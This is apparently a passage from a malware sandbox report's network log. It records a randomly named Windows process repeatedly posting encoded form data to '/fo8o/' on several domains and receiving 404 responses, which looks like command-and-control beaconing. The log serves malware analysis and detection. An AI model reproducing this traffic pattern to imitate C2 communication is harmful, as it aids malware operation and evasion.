43 45 72 73 52 67 4e 43 69 52 51 72 32 34 49 61 57 76 65 45 77 52 5a 78 58 76 78 74 44 47 37 78 76 39 74 5a Data Ascii: FBEd=WMd0CYxlLH1jvm2QnkfepwmYQQIuYykG6jxX+cvRCZ2PcFJrMrAJC6uXYmu9jdJ144zuz+Aa98THBBxGFcMzM3Fhc4OI/m70ifEzN/rrYZdyGQj7lGDwsDagrjfGFjE9PwKvlA+o6UAofp+T6G8m2sBsCErsRgNCiRQr24IaWveEwRZxXvxtDG7xv9tZ
May 8, 2024 10:50:56.893878937 CEST	367	IN	HTTP/1.1 404 Not Found Date: Wed, 08 May 2024 08:50:56 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.10	49737	195.110.124.133	80	1816	C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe

Timestamp	Bytes transferred	Direction	Data
May 8, 2024 10:50:59.425337076 CEST	812	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.elettrosistemista.zip Origin: http://www.elettrosistemista.zip Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 217 Referer: http://www.elettrosistemista.zip/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 46 42 45 64 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 75 47 47 51 6d 48 6e 65 68 77 6d 5a 56 51 49 75 53 53 6b 43 36 6a 39 58 2b 64 71 4d 43 73 75 50 66 6c 35 72 65 71 41 4a 46 36 75 58 58 47 75 38 6e 64 4a 71 34 34 2f 51 7a 2f 38 61 39 39 33 48 42 46 31 47 46 72 51 30 50 48 46 6a 58 59 4f 47 69 57 37 30 69 66 45 7a 4e 2b 62 52 59 64 78 79 47 41 7a 37 6b 6e 44 7a 76 44 61 6a 73 6a 66 47 58 54 45 35 50 77 4b 4e 6c 42 7a 39 36 53 45 6f 66 72 6d 54 30 79 67 6c 2f 73 42 71 66 55 71 35 64 77 4d 30 36 52 41 4c 34 75 6b 49 49 4d 65 5a 33 77 34 32 47 2b 51 36 51 78 6e 2f 68 37 59 7a 61 66 32 65 39 37 32 4a 4f 62 73 48 36 72 69 52 72 49 4f 79 4d 77 3d 3d Data Ascii: FBEd=WMd0CYxlLH1juGGQmHnehwmZVQIuSSkC6j9X+dqMCsuPfl5reqAJF6uXXGu8ndJq44/Qz/8a993HBF1GFrQ0PHFjXYOGiW70ifEzN+bRYdxyGAz7knDzvDajsjfGXTE5PwKNlBz96SEofrmT0ygl/sBqfUq5dwM06RAL4ukIIMeZ3w42G+Q6Qxn/h7Yzaf2e972JObsH6riRrIOyMw==
May 8, 2024 10:50:59.765860081 CEST	367	IN	HTTP/1.1 404 Not Found Date: Wed, 08 May 2024 08:50:59 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.10	49738	195.110.124.133	80	1816	C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe

Timestamp	Bytes transferred	Direction	Data
May 8, 2024 10:51:03.462506056 CEST	1825	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.elettrosistemista.zip Origin: http://www.elettrosistemista.zip Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1229 Referer: http://www.elettrosistemista.zip/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 46 42 45 64 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 75 47 47 51 6d 48 6e 65 68 77 6d 5a 56 51 49 75 53 53 6b 43 36 6a 39 58 2b 64 71 4d 43 76 4f 50 63 58 78 72 64 4a 6f 4a 45 36 75 58 65 6d 75 68 6e 64 49 32 34 34 6e 4d 7a 2f 77 4b 39 2b 66 48 42 6d 74 47 44 65 6b 30 59 58 46 6a 59 34 4f 4c 2f 6d 37 62 69 66 55 33 4e 2b 72 52 59 64 78 79 47 43 37 37 6a 32 44 7a 70 44 61 67 72 6a 66 4b 46 6a 46 65 50 77 69 33 6c 42 32 47 35 69 6b 6f 66 4c 32 54 32 48 38 6c 6a 38 42 6f 63 55 72 36 64 77 41 6e 36 52 4d 48 34 71 73 6d 49 4d 32 5a 30 33 46 74 57 4d 51 6d 4b 53 66 2f 68 61 30 53 65 49 71 74 39 59 76 43 4b 61 73 43 35 6f 37 44 76 4a 62 39 53 36 53 68 77 4f 48 2b 6e 6e 5a 35 5a 30 51 37 30 74 4e 47 45 30 61 73 4e 45 43 76 6f 50 68 41 71 41 5a 71 35 46 73 4f 52 6c 72 65 5a 61 4b 48 65 6f 2b 45 41 7a 2b 42 2f 77 36 52 30 4e 43 35 38 4b 33 65 51 48 39 45 50 32 53 7a 58 78 48 58 52 70 75 75 43 75 66 49 7a 70 43 78 67 70 7a 77 38 69 31 6d 6b 52 56 59 69 74 6d 32 67 6f 5a 2b 2f 69 78 6a 34 37 72 76 6a 66 45 46 70 [TRUNCATED] Data Ascii: FBEd=WMd0CYxlLH1juGGQmHnehwmZVQIuSSkC6j9X+dqMCvOPcXxrdJoJE6uXemuhndI244nMz/wK9+fHBmtGDek0YXFjY4OL/m7bifU3N+rRYdxyGC77j2DzpDagrjfKFjFePwi3lB2G5ikofL2T2H8lj8BocUr6dwAn6RMH4qsmIM2Z03FtWMQmKSf/ha0SeIqt9YvCKasC5o7DvJb9S6ShwOH+nnZ5Z0Q70tNGE0asNECvoPhAqAZq5FsORlreZaKHeo+EAz+B/w6R0NC58K3eQH9EP2SzXxHXRpuuCufIzpCxgpzw8i1mkRVYitm2goZ+/ixj47rvjfEFpuvNwsVGrC9Ifw2YrdCRtt6C8W3LYNMRo5bYRsp5nM/eqiKZoxDflpLJCB1lRodrNt9wL04Nd7adY6OISb476q0Y+bu10hDKbenTSRmadHEf0eVQ5e72bsYEpgRn4m0ARNwjYtA65YOS7JXA8qQZK9J+v82n+8bZPo0Nr7SQ38lzIXClwTVPxq1Hwgj8JMdREJFA3BxuX7KJV1APZhBI1HF7stIRV3zyK4EWKrUzBXXJd1lPI6ARFntXU9f+OTNkDu3bX/n2oTR3tx3Ewd0gagFpgQIf7H/nmEJ77rrU4uHKJsxyunkmDTMnUuwx+ReZxyg80KZmYOLkwJB8gRXGcZzsbkEjdPwgsm5mu2bXuTV3gWk0yjasmprGYn0GXqzQo11V6OjES+nsii6idI2SPk8sxAhtpyE2rdJwnYD0v//hfsCUaLrg8fQUD0ny29uXdZFXSHobu8OhSYV04z2yFUczP/mc/PcOhDTlz5IgbSNEVUxpgBuaeOnOEXNBhn7k/Bkjy1wXuZCp+eM0YwZXaqGDZRxtWEdxffa1e/LPB2m/ddZGDB0PNzgFyMqopHxo38WOQNpYChPmiVUhwqQxYNPv3BhUKV9kNpMP8N6szTlwPzc1dpZsnfZIgRMmiBIxgNPZExJjK1Kfng0Skcl7bFwcA0XwD54SE8Z [TRUNCATED]
May 8, 2024 10:51:03.799741983 CEST	367	IN	HTTP/1.1 404 Not Found Date: Wed, 08 May 2024 08:51:03 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.10	49739	195.110.124.133	80	1816	C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe

Timestamp	Bytes transferred	Direction	Data
May 8, 2024 10:51:06.331902981 CEST	507	OUT	GET /fo8o/?4h8=YPQX8Tch&FBEd=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMNnVmQq+khzPxid8+dZ7ofOMdeDHH5A== HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.elettrosistemista.zip Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
May 8, 2024 10:51:06.707916021 CEST	367	IN	HTTP/1.1 404 Not Found Date: Wed, 08 May 2024 08:51:06 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.10	49740	23.227.38.74	80	1816	C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe

Timestamp	Bytes transferred	Direction	Data
May 8, 2024 10:51:12.185513973 CEST	782	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.donnavariedades.com Origin: http://www.donnavariedades.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 193 Referer: http://www.donnavariedades.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 46 42 45 64 3d 6f 38 66 55 32 74 6a 56 52 44 67 57 48 2b 6f 2f 67 47 49 7a 48 36 46 62 6c 68 36 44 37 74 4b 38 34 6c 70 7a 4d 43 52 30 78 63 75 62 75 42 75 42 77 68 55 38 72 79 4d 52 76 6a 32 35 57 55 30 58 39 66 32 77 62 51 64 6b 55 78 6c 43 4c 34 38 74 5a 65 6f 73 63 7a 2f 66 53 33 64 48 74 49 56 2f 6a 68 35 64 52 72 64 57 45 5a 4f 32 78 52 6f 55 44 34 72 66 58 55 68 54 2f 51 58 43 45 34 59 55 72 49 44 69 49 6d 7a 78 4a 65 67 30 37 31 48 64 44 6a 70 2f 78 39 47 31 6a 4e 38 33 4d 41 48 44 70 37 63 66 36 45 2f 52 6f 38 6c 6b 58 59 47 6b 64 32 64 39 50 66 45 74 4a 64 78 68 Data Ascii: FBEd=o8fU2tjVRDgWH+o/gGIzH6Fblh6D7tK84lpzMCR0xcubuBuBwhU8ryMRvj25WU0X9f2wbQdkUxlCL48tZeoscz/fS3dHtIV/jh5dRrdWEZO2xRoUD4rfXUhT/QXCE4YUrIDiImzxJeg071HdDjp/x9G1jN83MAHDp7cf6E/Ro8lkXYGkd2d9PfEtJdxh
May 8, 2024 10:51:12.491338968 CEST	1289	IN	HTTP/1.1 404 Not Found Date: Wed, 08 May 2024 08:51:12 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close X-Sorting-Hat-PodId: 311 X-Sorting-Hat-ShopId: 87850025272 Vary: Accept-Encoding x-frame-options: DENY x-shopid: 87850025272 x-shardid: 311 x-request-id: 9a6dc7db-0394-4880-b691-abed2da91c16-1715158272 server-timing: processing;dur=32 content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=9a6dc7db-0394-4880-b691-abed2da91c16-1715158272 x-content-type-options: nosniff x-download-options: noopen x-permitted-cross-domain-policies: none x-xss-protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=9a6dc7db-0394-4880-b691-abed2da91c16-1715158272 x-dc: gcp-us-west1,gcp-us-east1,gcp-us-east1 Content-Encoding: gzip CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aNZurGMiBUjjH65nycq3vVVh8%2FaiQ%2BgU2QsjucWpF7EOlaV%2BJT8Op%2FVeQhkp6bXwWH9xT1Elgyj%2BTKfcIiXwaXnO1 Data Raw: Data Ascii:
May 8, 2024 10:51:12.491357088 CEST	293	IN	Data Raw: 41 4e 76 61 7a 31 31 70 53 79 31 41 72 61 63 4f 44 36 44 6f 4c 67 59 57 61 35 7a 44 71 6a 71 66 79 25 32 46 36 59 52 38 67 75 64 50 79 61 6f 43 54 39 46 39 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 Data Ascii: ANvaz11pSy1AracOD6DoLgYWa5zDqjqfy%2F6YR8gudPyaoCT9F9"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=140.000105Server: cloudflareCF-RAY: 8808
May 8, 2024 10:51:12.491369009 CEST	1289	IN	Data Raw: 36 62 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 95 58 5b 93 db b6 15 7e f7 af 40 e9 e9 8c d3 e1 1d 14 29 d2 d4 ba ce da 6d 33 b3 69 33 75 66 3a ed 1b 44 42 22 b2 14 c1 82 90 b4 9b 4c fe 7b 0f 00 82 22 77 25 a7 d9 1d 5b b8 9c eb 77 2e 38 da f2 0f 9f Data Ascii: 6b9X[~@)m3i3uf:DB"L{"w%[w.8qyho9BJs;op!l ke`&9#A*I>RR${I0>/hEMEG"S5j?yYruwg}d
May 8, 2024 10:51:12.491385937 CEST	439	IN	Data Raw: 01 6e 70 a2 ce ee 43 1f af 81 11 23 d0 82 f3 95 65 0a fd 38 06 09 46 de c3 c2 ac e5 ee 3f 8e 4e c4 2f 3a 01 e7 a9 f8 f6 73 fe ed 67 ac 52 c4 5c e9 d6 bb 71 e2 e9 40 3d 36 3f 71 06 55 a6 a7 5b e7 ae 0c 14 0e bf 0d 12 b8 9e ad dc 78 8d ee ed ca cf Data Ascii: npC#e8F?N/:sgR\q@=6?qU[xTn0`3.!8cjmVD V U_92X/8VWHot2_+q9-$+({Tw38w_8\|%mjH7A\d<2v~}0t
May 8, 2024 10:51:12.491394997 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.10	49741	23.227.38.74	80	1816	C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe

Timestamp	Bytes transferred	Direction	Data
May 8, 2024 10:51:14.901375055 CEST	806	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.donnavariedades.com Origin: http://www.donnavariedades.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 217 Referer: http://www.donnavariedades.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 46 42 45 64 3d 6f 38 66 55 32 74 6a 56 52 44 67 57 42 75 59 2f 6a 6c 77 7a 41 61 46 63 37 52 36 44 77 4e 4c 33 34 6c 6c 7a 4d 44 6b 76 78 71 2b 62 76 67 65 42 68 51 55 38 71 79 4d 52 6e 44 33 7a 63 30 30 59 39 66 71 34 62 55 5a 6b 55 31 4e 43 4c 35 4d 74 5a 4e 41 76 63 6a 2f 64 48 6e 64 46 79 59 56 2f 6a 68 35 64 52 72 4a 38 45 5a 57 32 78 46 73 55 43 5a 72 63 4c 45 68 51 38 51 58 43 41 34 59 51 72 49 44 4d 49 69 71 61 4a 61 51 30 37 30 33 64 44 33 64 34 36 39 47 2f 74 74 39 61 66 44 2b 4f 6c 2b 67 45 79 58 58 47 38 2f 70 51 55 35 6e 6a 4d 6e 38 71 63 6f 59 6a 48 62 45 4c 53 51 6f 47 79 53 76 57 6e 33 4e 53 2b 47 6a 79 72 32 31 33 45 51 3d 3d Data Ascii: FBEd=o8fU2tjVRDgWBuY/jlwzAaFc7R6DwNL34llzMDkvxq+bvgeBhQU8qyMRnD3zc00Y9fq4bUZkU1NCL5MtZNAvcj/dHndFyYV/jh5dRrJ8EZW2xFsUCZrcLEhQ8QXCA4YQrIDMIiqaJaQ0703dD3d469G/tt9afD+Ol+gEyXXG8/pQU5njMn8qcoYjHbELSQoGySvWn3NS+Gjyr213EQ==
May 8, 2024 10:51:15.254306078 CEST	1289	IN	HTTP/1.1 404 Not Found Date: Wed, 08 May 2024 08:51:15 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close X-Sorting-Hat-PodId: 311 X-Sorting-Hat-ShopId: 87850025272 Vary: Accept-Encoding x-frame-options: DENY x-shopid: 87850025272 x-shardid: 311 x-request-id: 2199823c-e987-4621-a11f-a61bbf44d90c-1715158274 server-timing: processing;dur=16 content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=2199823c-e987-4621-a11f-a61bbf44d90c-1715158274 x-content-type-options: nosniff x-download-options: noopen x-permitted-cross-domain-policies: none x-xss-protection: 1; mode=block; report=/xss-report?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=2199823c-e987-4621-a11f-a61bbf44d90c-1715158274 x-dc: gcp-us-west1,gcp-us-east1,gcp-us-east1 Content-Encoding: gzip CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J67Qfkpny3Chmi2KspWsNPn9cvW3xVSbLp5U7FZUGZ4YTNkGZkCs%2Fi%2BlR0Dmw7MYTj1dU2jItIq69ISa5knhjWygjO0FLP0 Data Raw: Data Ascii:
May 8, 2024 10:51:15.254319906 CEST	287	IN	Data Raw: 6a 51 31 72 79 5a 6d 56 75 77 41 42 38 77 25 32 42 50 32 5a 73 42 42 6e 38 73 76 61 50 72 4d 43 67 65 6a 53 53 6d 43 6a 54 71 6b 6c 35 64 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 Data Ascii: jQ1ryZmVuwAB8w%2BP2ZsBBn8svaPrMCgejSSmCjTqkl5d"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=189.999819Server: cloudflareCF-RAY: 880834f2ab
May 8, 2024 10:51:15.254333973 CEST	1289	IN	Data Raw: 36 62 37 0d 0a 1f 8b 08 00 00 00 00 00 04 03 95 58 5b 6f db 36 14 7e ef af e0 54 0c e8 06 dd 29 5b b6 2a a7 eb d2 6c 2b 90 6e c5 32 60 d8 de 68 89 b6 b8 c8 a2 46 d1 76 b2 a1 ff 7d 87 a4 28 4b 89 dd 6d 09 5a f3 72 ae df b9 f0 38 f9 17 ef 7e ba fe Data Ascii: 6b7X[o6~T)[l+n2`hFv}(KmZr8~7E>PM()^ $\9{p^Ru`ok`]9nT8lA-5EZIdPt)}Fk.J5eZ,YUKo_;=/p
May 8, 2024 10:51:15.254348040 CEST	437	IN	Data Raw: 89 3a bb 0e 7d bc 00 46 8c 40 0b 5e ce 2c 53 e8 c7 31 48 30 f2 6e 27 66 4d 77 bf 3b 3a 11 ef 74 02 8e 53 f1 e5 cd f2 db 1b ac 52 c4 5c e9 d6 bb 72 e2 e1 40 3d 36 7f 70 06 55 a6 a7 5b e7 2a 0f 14 0e ff 0e 12 b8 9e ce dc 78 81 ae ed ca 5f ce e7 0a Data Ascii: :}F@^,S1H0n'fMw;:tSR\r@=6pU[x_pci~@1+Voh Y9j9zqm]0X+/MYspnc1AvrXE /`{.g>;0l omS\qJZA)"n>9xdvyya\|+t
May 8, 2024 10:51:15.254511118 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.10	49742	23.227.38.74	80	1816	C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe

Timestamp	Bytes transferred	Direction	Data
May 8, 2024 10:51:17.587469101 CEST	1819	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.donnavariedades.com Origin: http://www.donnavariedades.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1229 Referer: http://www.donnavariedades.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 46 42 45 64 3d 6f 38 66 55 32 74 6a 56 52 44 67 57 42 75 59 2f 6a 6c 77 7a 41 61 46 63 37 52 36 44 77 4e 4c 33 34 6c 6c 7a 4d 44 6b 76 78 71 32 62 75 57 4b 42 77 44 4d 38 34 69 4d 52 6d 44 33 77 63 30 30 2f 39 66 69 38 62 52 41 52 55 7a 4a 43 4a 62 45 74 4d 4d 41 76 53 6a 2f 64 59 58 64 47 74 49 55 72 6a 68 4a 5a 52 72 5a 38 45 5a 57 32 78 44 41 55 46 49 72 63 4a 45 68 54 2f 51 58 30 45 34 5a 31 72 49 62 36 49 69 6e 68 49 70 59 30 31 33 66 64 41 43 70 34 6d 74 47 78 67 4e 39 43 66 43 44 4f 6c 36 49 6d 79 57 6a 67 38 2f 52 51 43 66 4b 4b 50 48 77 58 4a 62 49 32 4a 70 45 39 55 32 30 51 38 6a 75 30 70 6e 5a 36 39 58 79 6d 39 47 30 54 47 2f 6c 75 71 78 35 5a 37 57 55 66 58 41 63 4b 64 48 72 6a 47 36 33 38 2b 63 65 2b 4b 6f 46 79 78 6f 47 72 72 36 67 54 4f 31 47 48 68 32 74 6b 6a 56 71 30 44 51 30 59 68 65 75 55 33 4e 34 6e 61 6d 53 70 6c 57 77 6e 59 76 4d 53 6e 48 54 30 45 64 4b 44 7a 65 4d 44 4b 42 42 59 4f 4b 35 34 43 65 72 78 39 37 49 4e 4c 76 59 37 37 52 4d 50 6b 4d 38 61 34 4e 71 49 66 4a 2b 4c 55 [TRUNCATED] Data Ascii: 